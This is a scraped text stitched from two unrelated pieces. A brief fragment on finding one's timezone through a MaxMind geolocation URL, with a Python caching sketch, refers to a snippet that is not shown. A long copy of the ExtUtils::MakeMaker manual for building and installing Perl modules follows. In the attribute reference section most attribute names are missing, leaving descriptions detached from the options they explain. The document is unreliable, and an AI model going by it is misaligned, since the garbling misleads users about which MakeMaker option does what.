Europe/Stockholm
It would probably be wise to cache the result so that you can get your timezone even if your Internet connection is down.
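The snippet above targets Python 2; a rough Python 3 equivalent with the suggested caching might look like the sketch below. The cache path and function name are illustrative, and the URL is simply the one used above:

#!/usr/bin/env python3
import json
import os
import urllib.request

URL = ("https://js.maxmind.com/geoip/v2.1/city/me"
       "?referrer=https%3A%2F%2Fwww.maxmind.com")
CACHE = os.path.expanduser("~/.cache/ip2tz.json")  # illustrative location

def lookup_timezone():
    try:
        with urllib.request.urlopen(URL, timeout=10) as response:
            data = json.loads(response.read().decode("utf-8"))
        tz = data["location"]["time_zone"]
        # Cache the result so it survives a lost Internet connection.
        os.makedirs(os.path.dirname(CACHE), exist_ok=True)
        with open(CACHE, "w") as f:
            json.dump({"time_zone": tz}, f)
        return tz
    except OSError:
        # Offline or lookup failed: fall back to the cached value, if any.
        with open(CACHE) as f:
            return json.load(f)["time_zone"]

if __name__ == "__main__":
    print(lookup_timezone())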
|
ExtUtils::MakeMaker - Create a module Makefile
use ExtUtils::MakeMaker;
WriteMakefile(
    NAME => "Foo::Bar",
    VERSION_FROM => "lib/Foo/Bar.pm",
);
This utility is designed to write a Makefile for an extension module from a Makefile.PL. It is based on the Makefile.SH model provided by Andy Dougherty and the perl5-porters.
It splits the task of generating the Makefile into several subroutines that can be individually overridden. Each subroutine returns the text it wishes to have written to the Makefile.
As there are various Make programs with incompatible syntax, which use operating system shells, again with incompatible syntax, it is important for users of this module to know which flavour of Make a Makefile has been written for so they'll use the correct one and won't have to face the possibly bewildering errors resulting from using the wrong one.
On POSIX systems, that program will likely be GNU Make; on Microsoft Windows, it will be either Microsoft NMake or DMake. Note that this module does not support generating Makefiles for GNU Make on Windows. See the section on the "MAKE" parameter for details.
MakeMaker is object oriented. Each directory below the current directory that contains a Makefile.PL is treated as a separate object. This makes it possible to write an unlimited number of Makefiles with a single invocation of WriteMakefile().
The long answer is the rest of the manpage :-)
The generated Makefile enables the user of the extension to invoke
perl Makefile.PL # optionally "perl Makefile.PL verbose"
make
make test # optionally set TEST_VERBOSE=1
make install # See below
The Makefile to be produced may be altered by adding arguments of the form KEY=VALUE. E.g.
perl Makefile.PL INSTALL_BASE=~
Other interesting targets in the generated Makefile are
make config # to check if the Makefile is up-to-date
make clean # delete local temp files (Makefile gets renamed)
make realclean # delete derived files (including ./blib)
make ci # check in all the files in the MANIFEST file
make dist # see below the Distribution Support section
MakeMaker checks for the existence of a file named test.pl in the current directory, and if it exists it executes the script with the proper set of perl -I options.
MakeMaker also checks for any files matching glob("t/*.t"). It will execute all matching files in alphabetical order via the Test::Harness module with the -I switches set correctly.
If you'd like to see the raw output of your tests, set the TEST_VERBOSE variable to true.
make test TEST_VERBOSE=1
If you want to run particular test files, set the TEST_FILES variable. It is possible to use globbing with this mechanism.
make test TEST_FILES='t/foobar.t t/dagobah*.t'
A useful variation of the above is the target testdb. It runs the test under the Perl debugger (see perldebug). If the file test.pl exists in the current directory, it is used for the test.
If you want to debug some other testfile, set the TEST_FILE variable thusly:
make testdb TEST_FILE=t/mytest.t
By default the debugger is called using -d option to perl. If you want to specify some other option, set the TESTDB_SW variable:
make testdb TESTDB_SW=-Dx
make alone puts all relevant files into directories that are named by the macros INST_LIB, INST_ARCHLIB, INST_SCRIPT, INST_MAN1DIR and INST_MAN3DIR. All these default to something below ./blib if you are not building below the perl source directory. If you are building below the perl source, INST_LIB and INST_ARCHLIB default to ../../lib, and INST_SCRIPT is not defined.
The install target of the generated Makefile copies the files found below each of the INST_* directories to their INSTALL* counterparts. Which counterparts are chosen depends on the setting of INSTALLDIRS according to the following table:
                 INSTALLDIRS set to
                 perl               site                vendor

                 PERLPREFIX         SITEPREFIX          VENDORPREFIX
    INST_ARCHLIB INSTALLARCHLIB     INSTALLSITEARCH     INSTALLVENDORARCH
    INST_LIB     INSTALLPRIVLIB     INSTALLSITELIB      INSTALLVENDORLIB
    INST_BIN     INSTALLBIN         INSTALLSITEBIN      INSTALLVENDORBIN
    INST_SCRIPT  INSTALLSCRIPT      INSTALLSITESCRIPT   INSTALLVENDORSCRIPT
    INST_MAN1DIR INSTALLMAN1DIR     INSTALLSITEMAN1DIR  INSTALLVENDORMAN1DIR
    INST_MAN3DIR INSTALLMAN3DIR     INSTALLSITEMAN3DIR  INSTALLVENDORMAN3DIR
The INSTALL... macros in turn default to their %Config ($Config{installprivlib}, $Config{installarchlib}, etc.) counterparts.
You can check the values of these variables on your system with
perl '-V:install.*'
And to check the sequence in which the library directories are searched by perl, run
perl -le 'print join $/, @INC'
Sometimes older versions of the module you're installing live in other directories in @INC. Because Perl loads the first version of a module it finds, not the newest, you might accidentally get one of these older versions even after installing a brand new version. To delete all other versions of the module you're installing (not simply older ones) set the UNINST variable.
make install UNINST=1
INSTALL_BASE can be passed into Makefile.PL to change where your module will be installed. INSTALL_BASE is more like what everyone else calls "prefix" than PREFIX is.
To have everything installed in your home directory, do the following.
# Unix users, INSTALL_BASE=~ works fine
perl Makefile.PL INSTALL_BASE=/path/to/your/home/dir
Like PREFIX, it sets several INSTALL* attributes at once. Unlike PREFIX it is easy to predict where the module will end up. The installation pattern looks like this:
INSTALLARCHLIB INSTALL_BASE/lib/perl5/$Config{archname}
INSTALLPRIVLIB INSTALL_BASE/lib/perl5
INSTALLBIN INSTALL_BASE/bin
INSTALLSCRIPT INSTALL_BASE/bin
INSTALLMAN1DIR INSTALL_BASE/man/man1
INSTALLMAN3DIR INSTALL_BASE/man/man3
INSTALL_BASE in MakeMaker and --install_base in Module::Build (as of 0.28) install to the same location. If you want MakeMaker and Module::Build to install to the same location simply set INSTALL_BASE and --install_base to the same location.
INSTALL_BASE was added in 6.31.
PREFIX and LIB can be used to set several INSTALL* attributes in one go. Here's an example for installing into your home directory.
# Unix users, PREFIX=~ works fine
perl Makefile.PL PREFIX=/path/to/your/home/dir
This will install all files in the module under your home directory, with man pages and libraries going into an appropriate place (usually ~/man and ~/lib). How the exact location is determined is complicated and depends on how your Perl was configured. INSTALL_BASE works more like what other build systems call "prefix" than PREFIX and we recommend you use that instead.
Another way to specify many INSTALL directories with a single parameter is LIB.
perl Makefile.PL LIB=~/lib
This will install the module's architecture-independent files into ~/lib, the architecture-dependent files into ~/lib/$archname.
Note, that in both cases the tilde expansion is done by MakeMaker, not by perl by default, nor by make.
Conflicts between parameters LIB, PREFIX and the various INSTALL* arguments are resolved so that:
setting LIB overrides any setting of INSTALLPRIVLIB, INSTALLARCHLIB, INSTALLSITELIB, INSTALLSITEARCH (and they are not affected by PREFIX);
without LIB, setting PREFIX replaces the initial $Config{prefix} part of those INSTALL* arguments, even if the latter are explicitly set (but are set to still start with $Config{prefix}).
If the user has superuser privileges, and is not working on AFS or relatives, then the defaults for INSTALLPRIVLIB, INSTALLARCHLIB, INSTALLSCRIPT, etc. will be appropriate, and this incantation will be the best:
perl Makefile.PL;
make;
make test
make install
make install by default writes some documentation of what has been done into the file $(INSTALLARCHLIB)/perllocal.pod. This feature can be bypassed by calling make pure_install.
AFS users will have to specify the installation directories as these most probably have changed since perl itself has been installed. They will have to do this by calling
perl Makefile.PL INSTALLSITELIB=/afs/here/today \
INSTALLSCRIPT=/afs/there/now INSTALLMAN3DIR=/afs/for/manpages
make
Be careful to repeat this procedure every time you recompile an extension, unless you are sure the AFS installation directories are still valid.
An extension that is built with the above steps is ready to use on systems supporting dynamic loading. On systems that do not support dynamic loading, any newly created extension has to be linked together with the available resources. MakeMaker supports the linking process by creating appropriate targets in the Makefile whenever an extension is built. You can invoke the corresponding section of the makefile with
make perl
That produces a new perl binary in the current directory with all extensions linked in that can be found in INST_ARCHLIB, SITELIBEXP, and PERL_ARCHLIB. To do that, MakeMaker writes a new Makefile; on UNIX, this is called Makefile.aperl (may be system dependent). If you want to force the creation of a new perl, it is recommended that you delete this Makefile.aperl, so the directories are searched through for linkable libraries again.
The binary can be installed into the directory where perl normally resides on your machine with
make inst_perl
To produce a perl binary with a different name than perl, either say
perl Makefile.PL MAP_TARGET=myperl
make myperl
make inst_perl
or say
perl Makefile.PL
make myperl MAP_TARGET=myperl
make inst_perl MAP_TARGET=myperl
In any case you will be prompted with the correct invocation of the inst_perl target that installs the new binary into INSTALLBIN.
make inst_perl by default writes some documentation of what has been done into the file $(INSTALLARCHLIB)/perllocal.pod. This can be bypassed by calling make pure_inst_perl.
Warning: the inst_perl: target will most probably overwrite your existing perl binary. Use with care!
Sometimes you might want to build a statically linked perl although your system supports dynamic loading. In this case you may explicitly set the linktype with the invocation of the Makefile.PL or make:
perl Makefile.PL LINKTYPE=static # recommended
or
make LINKTYPE=static # works on most systems
MakeMaker needs to know, or to guess, where certain things are located. Especially INST_LIB and INST_ARCHLIB (where to put the files during the make(1) run), PERL_LIB and PERL_ARCHLIB (where to read existing modules from), and PERL_INC (header files and libperl*.*).
Extensions may be built either using the contents of the perl source directory tree or from the installed perl library. The recommended way is to build extensions after you have run 'make install' on perl itself. You can do that in any directory on your hard disk that is not below the perl source tree. The support for extensions below the ext directory of the perl distribution is only good for the standard extensions that come with perl.
If an extension is being built below the ext/ directory of the perl source then MakeMaker will set PERL_SRC automatically (e.g., ../..). If PERL_SRC is defined and the extension is recognized as a standard extension, then other variables default to the following:
PERL_INC = PERL_SRC
PERL_LIB = PERL_SRC/lib
PERL_ARCHLIB = PERL_SRC/lib
INST_LIB = PERL_LIB
INST_ARCHLIB = PERL_ARCHLIB
If an extension is being built away from the perl source then MakeMaker will leave PERL_SRC undefined and default to using the installed copy of the perl library. The other variables default to the following:
PERL_INC = $archlibexp/CORE
PERL_LIB = $privlibexp
PERL_ARCHLIB = $archlibexp
INST_LIB = ./blib/lib
INST_ARCHLIB = ./blib/arch
If perl has not yet been installed then PERL_SRC can be defined on the command line as shown in the previous section.
If you don't want to keep the defaults for the INSTALL* macros, MakeMaker helps you to minimize the typing needed: the usual relationship between INSTALLPRIVLIB and INSTALLARCHLIB is determined by Configure at perl compilation time. MakeMaker supports the user who sets INSTALLPRIVLIB. If INSTALLPRIVLIB is set, but INSTALLARCHLIB not, then MakeMaker defaults the latter to be the same subdirectory of INSTALLPRIVLIB as Configure decided for the counterparts in %Config, otherwise it defaults to INSTALLPRIVLIB. The same relationship holds for INSTALLSITELIB and INSTALLSITEARCH.
MakeMaker gives you much more freedom than needed to configure internal variables and get different results. It is worth mentioning that make(1) also lets you configure most of the variables that are used in the Makefile. But in the majority of situations this will not be necessary, and should only be done if the author of a package recommends it (or you know what you're doing).
The following attributes may be specified as arguments to WriteMakefile() or as NAME=VALUE pairs on the command line. Attributes that became available with later versions of MakeMaker are indicated.
In order to maintain portability of attributes with older versions of MakeMaker you may want to use App::EUMM::Upgrade with your Makefile.PL.
One line description of the module. Will be included in PPD file.
Name of the file that contains the package description. MakeMaker looks for a line in the POD matching /^($package\s-\s)(.*)/. This is typically the first line in the "=head1 NAME" section. $2 becomes the abstract.
Array of strings containing name (and email address) of package author(s). Is used in CPAN Meta files (META.yml or META.json) and PPD (Perl Package Description) files for PPM (Perl Package Manager).
Used when creating PPD files for binary packages. It can be set to a full or relative path or URL to the binary archive for a particular architecture. For example:
perl Makefile.PL BINARY_LOCATION=x86/Agent.tar.gz
builds a PPD package that references a binary of the Agent package, located in the x86 directory relative to the PPD itself.
Available in version 6.5503 and above.
A hash of modules that are needed to build your module but not run it.
This will go into the build_requires field of your META.yml and the build of the prereqs field of your META.json.
Defaults to { "ExtUtils::MakeMaker" => 0 } if this attribute is not specified.
The format is the same as PREREQ_PM.
Ref to array of *.c file names. Initialised from a directory scan and the values portion of the XS attribute hash. This is not currently used by MakeMaker but may be handy in Makefile.PLs.
String that will be included in the compiler call command line between the arguments INC and OPTIMIZE.
Arrayref. E.g. [qw(archname manext)] defines ARCHNAME & MANEXT from config.sh. MakeMaker will add to CONFIG the following values anyway: ar cc cccdlflags ccdlflags dlext dlsrc ld lddlflags ldflags libc lib_ext obj_ext ranlib sitelibexp sitearchexp so
CODE reference. The subroutine should return a hash reference. The hash may contain further attributes, e.g. {LIBS => ...}, that have to be determined by some evaluation method.
Available in version 6.52 and above.
A hash of modules that are required to run Makefile.PL itself, but not to run your distribution.
This will go into the configure_requires field of your META.yml and the configure of the prereqs field of your META.json.
Defaults to { "ExtUtils::MakeMaker" => 0 } if this attribute is not specified.
The format is the same as PREREQ_PM.
Something like "-DHAVE_UNISTD_H"
This is the root directory into which the code will be installed. It prepends itself to the normal prefix. For example, if your code would normally go into /usr/local/lib/perl you could set DESTDIR=~/tmp/ and installation would go into ~/tmp/usr/local/lib/perl.
This is primarily of use for people who repackage Perl modules.
NOTE: Due to the nature of make, it is important that you put the trailing slash on your DESTDIR. ~/tmp/ not ~/tmp.
Ref to array of subdirectories containing Makefile.PLs e.g. ['sdbm'] in ext/SDBM_File
A safe filename for the package.
Defaults to NAME below but with :: replaced with -.
For example, Foo::Bar becomes Foo-Bar.
Your name for distributing the package with the version number included. This is used by 'make dist' to name the resulting archive file.
Defaults to DISTNAME-VERSION.
For example, version 1.04 of Foo::Bar becomes Foo-Bar-1.04.
On some OS's where . has special meaning VERSION_SYM may be used in place of VERSION.
Specifies the extension of the module's loadable object. For example:
DLEXT => 'unusual_ext', # Default value is $Config{so}
NOTE: When using this option to alter the extension of a module's loadable object, it is also necessary that the module's pm file specifies the same change:
local $DynaLoader::dl_dlext = 'unusual_ext';
Hashref of symbol names for routines to be made available as universal symbols. Each key/value pair consists of the package name and an array of routine names in that package. Used only under AIX, OS/2, VMS and Win32 at present. The routine names supplied will be expanded in the same way as XSUB names are expanded by the XS() macro. Defaults to
{"$(NAME)" => ["boot_$(NAME)" ] }
e.g.
{"RPC" => [qw( boot_rpcb rpcb_gettime getnetconfigent )],
"NetconfigPtr" => [ 'DESTROY'] }
Please see the ExtUtils::Mksymlists documentation for more information about the DL_FUNCS, DL_VARS and FUNCLIST attributes.
Array of symbol names for variables to be made available as universal symbols. Used only under AIX, OS/2, VMS and Win32 at present. Defaults to []. (e.g. [ qw(Foo_version Foo_numstreams Foo_tree ) ])
Array of extension names to exclude when doing a static build. This is ignored if INCLUDE_EXT is present. Consult INCLUDE_EXT for more details. (e.g. [ qw( Socket POSIX ) ] )
This attribute may be most useful when specified as a string on the command line: perl Makefile.PL EXCLUDE_EXT='Socket Safe'
Ref to array of executable files. The files will be copied to the INST_SCRIPT directory. Make realclean will delete them from there again.
If your executables start with something like #!perl or #!/usr/bin/perl MakeMaker will change this to the path of the perl 'Makefile.PL' was invoked with so the programs will be sure to run properly even if perl is not in /usr/bin/perl.
The name of the Makefile to be produced. This is used for the second Makefile that will be produced for the MAP_TARGET.
Defaults to 'Makefile' or 'Descrip.MMS' on VMS.
(Note: we couldn't use MAKEFILE because dmake uses this for something else).
Perl binary able to run this extension, load XS modules, etc...
Like PERLRUN, except it uses FULLPERL.
Like PERLRUNINST, except it uses FULLPERL.
This provides an alternate means to specify function names to be exported from the extension. Its value is a reference to an array of function names to be exported by the extension. These names are passed through unaltered to the linker options file.
Ref to array of *.h file names. Similar to C.
This attribute is used to specify names to be imported into the extension. Takes a hash ref.
It is only used on OS/2 and Win32.
Include file dirs eg: "-I/usr/5include -I/path/to/inc"
Array of extension names to be included when doing a static build. MakeMaker will normally build with all of the installed extensions when doing a static build, and that is usually the desired behavior. If INCLUDE_EXT is present then MakeMaker will build only with those extensions which are explicitly mentioned. (e.g. [ qw( Socket POSIX ) ])
It is not necessary to mention DynaLoader or the current extension when filling in INCLUDE_EXT. If the INCLUDE_EXT is mentioned but is empty then only DynaLoader and the current extension will be included in the build.
This attribute may be most useful when specified as a string on the command line: perl Makefile.PL INCLUDE_EXT='POSIX Socket Devel::Peek'
Used by 'make install', which copies files from INST_ARCHLIB to this directory if INSTALLDIRS is set to perl.
Directory to install binary files (e.g. tkperl) into if INSTALLDIRS=perl.
Determines which of the sets of installation directories to choose: perl, site or vendor. Defaults to site.
These directories get the man pages at 'make install' time if INSTALLDIRS=perl. Defaults to $Config{installman*dir}.
If set to 'none', no man pages will be installed.
Used by 'make install', which copies files from INST_LIB to this directory if INSTALLDIRS is set to perl.
Defaults to $Config{installprivlib}.
Used by 'make install' which copies files from INST_SCRIPT to this directory if INSTALLDIRS=perl.
Used by 'make install', which copies files from INST_ARCHLIB to this directory if INSTALLDIRS is set to site (default).
Used by 'make install', which copies files from INST_BIN to this directory if INSTALLDIRS is set to site (default).
Used by 'make install', which copies files from INST_LIB to this directory if INSTALLDIRS is set to site (default).
These directories get the man pages at 'make install' time if INSTALLDIRS=site (default). Defaults to $(SITEPREFIX)/man/man$(MAN*EXT).
If set to 'none', no man pages will be installed.
Used by 'make install' which copies files from INST_SCRIPT to this directory if INSTALLDIRS is set to site (default).
Used by 'make install', which copies files from INST_ARCHLIB to this directory if INSTALLDIRS is set to vendor.
Used by 'make install', which copies files from INST_BIN to this directory if INSTALLDIRS is set to vendor.
Used by 'make install', which copies files from INST_LIB to this directory if INSTALLDIRS is set to vendor.
These directories get the man pages at 'make install' time if INSTALLDIRS=vendor. Defaults to $(VENDORPREFIX)/man/man$(MAN*EXT).
If set to 'none', no man pages will be installed.
Used by 'make install' which copies files from INST_SCRIPT to this directory if INSTALLDIRS is set to vendor.
Same as INST_LIB for architecture dependent files.
Directory to put real binary files during 'make'. These will be copied to INSTALLBIN during 'make install'
Directory where we put library files of this extension while building it.
Directory to hold the man pages at 'make' time
Directory to hold the man pages at 'make' time
Directory where executable files should be installed during 'make'. Defaults to "./blib/script", just to have a dummy location during testing. make install will copy the files in INST_SCRIPT to INSTALLSCRIPT.
Program to be used to link libraries for dynamic loading.
Defaults to $Config{ld}.
Any special flags that might need to be passed to ld to create a shared library suitable for dynamic loading. It is up to the makefile to use it. (See "lddlflags" in Config)
Defaults to $Config{lddlflags}.
Defaults to "$(OBJECT)" and is used in the ld command to specify what files to link/load from (also see dynamic_lib below for how to specify ld flags)
LIB should only be set at perl Makefile.PL time but is allowed as a MakeMaker argument. It has the effect of setting both INSTALLPRIVLIB and INSTALLSITELIB to that value regardless any explicit setting of those arguments (or of PREFIX). INSTALLARCHLIB and INSTALLSITEARCH are set to the corresponding architecture subdirectory.
The filename of the perl library that will be used together with this extension. Defaults to libperl.a.
An anonymous array of alternative library specifications to be searched for (in order) until at least one library is found. E.g.
'LIBS' => ["-lgdbm", "-ldbm -lfoo", "-L/path -ldbm.nfs"]
Mind, that any element of the array contains a complete set of arguments for the ld command. So do not specify
'LIBS' => ["-ltcl", "-ltk", "-lX11"]
See ODBM_File/Makefile.PL for an example, where an array is needed. If you specify a scalar as in
'LIBS' => "-ltcl -ltk -lX11"
MakeMaker will turn it into an array with one element.
Available in version 6.31 and above.
The licensing terms of your distribution. Generally it's "perl_5" for the same license as Perl itself.
See CPAN::Meta::Spec for the list of options.
Defaults to "unknown".
'static' or 'dynamic' (default unless usedl=undef in config.sh). Should only be used to force static linking (also see linkext below).
When this is set to 1, OBJECT will be automagically derived from XS.
Variant of make you intend to run the generated Makefile with. This parameter lets Makefile.PL know what make quirks to account for when generating the Makefile.
MakeMaker also honors the MAKE environment variable. This parameter takes precedence.
Currently the only significant values are 'dmake' and 'nmake' for Windows users, instructing MakeMaker to generate a Makefile in the flavour of DMake ("Dennis Vadura's Make") or Microsoft NMake respectively.
Defaults to $Config{make}, which may go looking for a Make program in your environment.
How are you supposed to know what flavour of Make a Makefile has been generated for if you didn't specify a value explicitly? Search the generated Makefile for the definition of the MAKE variable, which is used to recursively invoke the Make utility. That will tell you what Make you're supposed to invoke the Makefile with.
Boolean which tells MakeMaker that it should include the rules to make a perl. This is handled automatically as a switch by MakeMaker. The user normally does not need it.
When 'make clean' or similar is run, the $(FIRST_MAKEFILE) will be backed up at this location.
Defaults to $(FIRST_MAKEFILE).old or $(FIRST_MAKEFILE)_old on VMS.
Hashref of pod-containing files. MakeMaker will default this to all EXE_FILES files that include POD directives. The files listed here will be converted to man pages and installed as was requested at Configure time.
This hash should map POD files (or scripts containing POD) to the man file names under the blib/man1/ directory, as in the following example:
MAN1PODS => {
    'doc/command.pod' => 'blib/man1/command.1',
    'scripts/script.pl' => 'blib/man1/script.1',
}
Hashref that assigns to *.pm and *.pod files the files into which the manpages are to be written. MakeMaker parses all *.pod and *.pm files for POD directives. Files that contain POD will be the default keys of the MAN3PODS hashref. These will then be converted to man pages during make and will be installed during make install.
Example similar to MAN1PODS.
If it is intended that a new perl binary be produced, this variable may hold a name for that binary. Defaults to perl
Available in version 6.46 and above.
A hashref of items to add to the CPAN Meta file (META.yml or META.json).
They differ in how they behave if they have the same key as the default metadata. META_ADD will override the default value with its own. META_MERGE will merge its value with the default.
Unless you want to override the defaults, prefer META_MERGE so as to get the advantage of any future defaults.
By default CPAN Meta specification 1.4 is used. In order to use CPAN Meta specification 2.0, indicate with meta-spec the version you want to use.
META_MERGE => {
    "meta-spec" => { version => 2 },
    resources => {
        repository => {
            type => 'git',
            url => 'git://github.com/Perl-Toolchain-Gang/ExtUtils-MakeMaker.git',
            web => 'https://github.com/Perl-Toolchain-Gang/ExtUtils-MakeMaker',
        },
    },
},
Available in version 6.48 and above.
The minimum required version of Perl for this distribution.
Either the 5.006001 or the 5.6.1 format is acceptable.
If the extension links to a library that it builds, set this to the name of the library (see SDBM_File)
The package representing the distribution. For example, Test::More or ExtUtils::MakeMaker. It will be used to derive information about the distribution such as the DISTNAME, installation locations within the Perl library and where XS files will be looked for by default (see XS).
NAME must be a valid Perl package name and it must have an associated .pm file. For example, Foo::Bar is a valid NAME and there must exist Foo/Bar.pm. Any XS code should be in Bar.xs unless stated otherwise.
Your distribution must have a NAME.
MakeMaker will figure out if an extension contains linkable code anywhere down the directory tree, and will set this variable accordingly, but you can speed it up a very little bit if you define this boolean variable yourself.
Command so make does not print the literal commands it's running.
By setting it to an empty string you can generate a Makefile that prints all commands. Mainly used in debugging MakeMaker itself.
Defaults to @.
Boolean. Attribute to inhibit descending into subdirectories.
When true, suppresses the generation and addition to the MANIFEST of the META.yml and META.json module meta-data files during 'make distdir'.
Defaults to false.
When true, suppresses the generation of MYMETA.yml and MYMETA.json module meta-data files during 'perl Makefile.PL'.
Defaults to false.
When true, suppresses the writing of packlist files for installs.
Defaults to false.
When true, suppresses the appending of installations to perllocal.
Defaults to false.
In general, any generated Makefile checks for the current version of MakeMaker and the version the Makefile was built under. If NO_VC is set, the version check is neglected. Do not write this into your Makefile.PL, use it interactively instead.
List of object files, defaults to '$(BASEEXT)$(OBJ_EXT)', but can be a long string or an array containing all object files, e.g. "tkpBind.o tkpButton.o tkpCanvas.o" or ["tkpBind.o", "tkpButton.o", "tkpCanvas.o"]
(Where BASEEXT is the last component of NAME, and OBJ_EXT is $Config{obj_ext}.)
Defaults to -O. Set it to -g to turn debugging on. The flag is passed to subdirectory makes.
Perl binary for tasks that can be done by miniperl.
Set only when MakeMaker is building the extensions of the Perl core distribution.
The call to the program that is able to compile perlmain.c. Defaults to $(CC).
Same as for PERL_LIB, but for architecture dependent files.
Used only when MakeMaker is building the extensions of the Perl core distribution (because normally $(PERL_ARCHLIB) is automatically in @INC, and adding it would get in the way of PERL5LIB).
Directory containing the Perl library to use.
Used only when MakeMaker is building the extensions of the Perl core distribution (because normally $(PERL_LIB) is automatically in @INC, and adding it would get in the way of PERL5LIB).
defaults to 0. Should be set to TRUE if the extension can work with the memory allocation routines substituted by the Perl malloc() subsystem. This should be applicable to most extensions with exceptions of those
with bugs in memory allocations which are caught by Perl's malloc();
which interact with the memory allocator in other ways than via malloc(), realloc(), free(), calloc(), sbrk() and brk();
which rely on special alignment which is not provided by Perl's malloc().
NOTE. Neglecting to set this flag in any one of the loaded extension nullifies many advantages of Perl's malloc(), such as better usage of system resources, error detection, memory usage reporting, catchable failure of memory allocations, etc.
Directory under which core modules are to be installed.
Defaults to $Config{installprefixexp}, falling back to $Config{installprefix}, $Config{prefixexp} or $Config{prefix} should $Config{installprefixexp} not exist.
Overridden by PREFIX.
Use this instead of $(PERL) when you wish to run perl. It will set up extra necessary flags for you.
Use this instead of $(PERL) when you wish to run perl to work with modules. It will add things like -I$(INST_ARCH) and other necessary flags so perl can see the modules you're about to install.
Directory containing the Perl source code (use of this should be avoided, it may be undefined)
Desired permission for directories. Defaults to 755.
Desired permission for read/writable files. Defaults to 644.
Desired permission for executable files. Defaults to 755.
MakeMaker can run programs to generate files for you at build time. By default any file named *.PL (except Makefile.PL and Build.PL) in the top level directory will be assumed to be a Perl program and run passing its own basename in as an argument. For example...
perl foo.PL foo
This behavior can be overridden by supplying your own set of files to search. PL_FILES accepts a hash ref, the key being the file to run and the value is passed in as the first argument when the PL file is run.
PL_FILES => {'bin/foobar.PL' => 'bin/foobar'}
Would run bin/foobar.PL like this:
perl bin/foobar.PL bin/foobar
If multiple files from one program are desired an array ref can be used.
PL_FILES => {'bin/foobar.PL' => [qw(bin/foobar1 bin/foobar2)]}
In this case the program will be run multiple times using each target file.
perl bin/foobar.PL bin/foobar1
perl bin/foobar.PL bin/foobar2
PL files are normally run after pm_to_blib and include INST_LIB and INST_ARCH in their @INC, so the just built modules can be accessed... unless the PL file is making a module (or anything else in PM) in which case it is run before pm_to_blib and does not include INST_LIB and INST_ARCH in its @INC. This apparently odd behavior is there for backwards compatibility (and it's somewhat DWIM).
Hashref of .pm files and *.pl files to be installed. e.g.
{'name_of_file.pm' => '$(INST_LIB)/install_as.pm'}
By default this will include *.pm and *.pl and the files found in the PMLIBDIRS directories. Defining PM in the Makefile.PL will override PMLIBDIRS.
Ref to array of subdirectories containing library files. Defaults to [ 'lib', $(BASEEXT) ]. The directories will be scanned and any files they contain will be installed in the corresponding location in the library. A libscan() method can be used to alter the behaviour. Defining PM in the Makefile.PL will override PMLIBDIRS.
(Where BASEEXT is the last component of NAME.)
A filter program, in the traditional Unix sense (input from stdin, output to stdout) that is passed on each .pm file during the build (in the pm_to_blib() phase). It is empty by default, meaning no filtering is done.
Great care is necessary when defining the command if quoting needs to be done. For instance, you would need to say:
{'PM_FILTER' => 'grep -v \\"^\\#\\"'}
to remove all the leading comments on the fly during the build. The extra \\ are necessary, unfortunately, because this variable is interpolated within the context of a Perl program built on the command line, and double quotes are what is used with the -e switch to build that command line. The # is escaped for the Makefile, since what is going to be generated will then be:
PM_FILTER = grep -v \"^\#\"
Without the \\ before the #, we'd have the start of a Makefile comment, and the macro would be incorrectly defined.
Release 5.005 grandfathered old global symbol names by providing preprocessor macros for extension source compatibility. As of release 5.6, these preprocessor definitions are not available by default. The POLLUTE flag specifies that the old names should still be defined:
perl Makefile.PL POLLUTE=1
Please inform the module author if this is necessary to successfully install a module under 5.6 or later.
Name of the executable used to run PPM_INSTALL_SCRIPT below. (e.g. perl)
Name of the script that gets executed by the Perl Package Manager after the installation of a package.
Name of the executable used to run PPM_UNINSTALL_SCRIPT below. (e.g. perl)
Name of the script that gets executed by the Perl Package Manager before the removal of a package.
This overrides all the default install locations. Man pages, libraries, scripts, etc... MakeMaker will try to make an educated guess about where to place things under the new PREFIX based on your Config defaults. Failing that, it will fall back to a structure which should be sensible for your platform.
If you specify LIB or any INSTALL* variables they will not be affected by the PREFIX.
Bool. If this parameter is true, failing to have the required modules (or the right versions thereof) will be fatal. perl Makefile.PL will die instead of simply informing the user of the missing dependencies.
It is extremely rare to have to use PREREQ_FATAL. Its use by module authors is strongly discouraged and should never be used lightly.
For dependencies that are required in order to run Makefile.PL, see CONFIGURE_REQUIRES.
Module installation tools have ways of resolving unmet dependencies but to do that they need a Makefile. Using PREREQ_FATAL breaks this. That's bad.
Assuming you have good test coverage, your tests should fail with missing dependencies informing the user more strongly that something is wrong. You can write a t/00compile.t test which will simply check that your code compiles and stop "make test" prematurely if it doesn't. See "BAIL_OUT" in Test::More for more details.
A hash of modules that are needed to run your module. The keys are the module names ie. Test::More, and the minimum version is the value. If the required version number is 0 any version will do.
This will go into the requires field of your META.yml and the runtime of the prereqs field of your META.json.
PREREQ_PM => {
    # Require Test::More at least 0.47
    "Test::More" => "0.47",
    # Require any version of Acme::Buffy
    "Acme::Buffy" => 0,
}
Bool. If this parameter is true, the prerequisites will be printed to stdout and MakeMaker will exit. The output format is an evalable hash ref.
$PREREQ_PM = {
    'A::B' => Vers1,
    'C::D' => Vers2,
    ...
};
If a distribution defines a minimal required perl version, this is added to the output as an additional line of the form:
$MIN_PERL_VERSION = '5.008001';
If BUILD_REQUIRES is not empty, it will be dumped as $BUILD_REQUIRES hashref.
RedHatism for PREREQ_PRINT. The output format is different, though:
perl(A::B)>=Vers1 perl(C::D)>=Vers2 ...
A minimal required perl version, if present, will look like this:
perl(perl)>=5.008001
Like PERLPREFIX, but only for the site install locations.
Defaults to $Config{siteprefixexp}. Perls prior to 5.6.0 didn't have an explicit siteprefix in the Config. In those cases $Config{installprefix} will be used.
Overridable by PREFIX
When true, perform the generation and addition to the MANIFEST of the SIGNATURE file in the distdir during 'make distdir', via 'cpansign -s'.
Note that you need to install the Module::Signature module to perform this operation.
Defaults to false.
Arrayref. E.g. [qw(name1 name2)] skip (do not write) sections of the Makefile. Caution! Do not use the SKIP attribute for the negligible speedup. It may seriously damage the resulting Makefile. Only use it if you really need it.
Available in version 6.64 and above.
A hash of modules that are needed to test your module but not run or build it.
This will go into the build_requires field of your META.yml and the test of the prereqs field of your META.json.
The format is the same as PREREQ_PM.
Ref to array of typemap file names. Use this when the typemaps are in some directory other than the current directory or when they are not named typemap. The last typemap in the list takes precedence. A typemap in the current directory has highest precedence, even if it isn't listed in TYPEMAPS. The default system typemap has lowest precedence.
Like PERLPREFIX, but only for the vendor install locations.
Defaults to $Config{vendorprefixexp}.
Overridable by PREFIX
If true, make install will be verbose
Your version number for distributing the package. This defaults to 0.1.
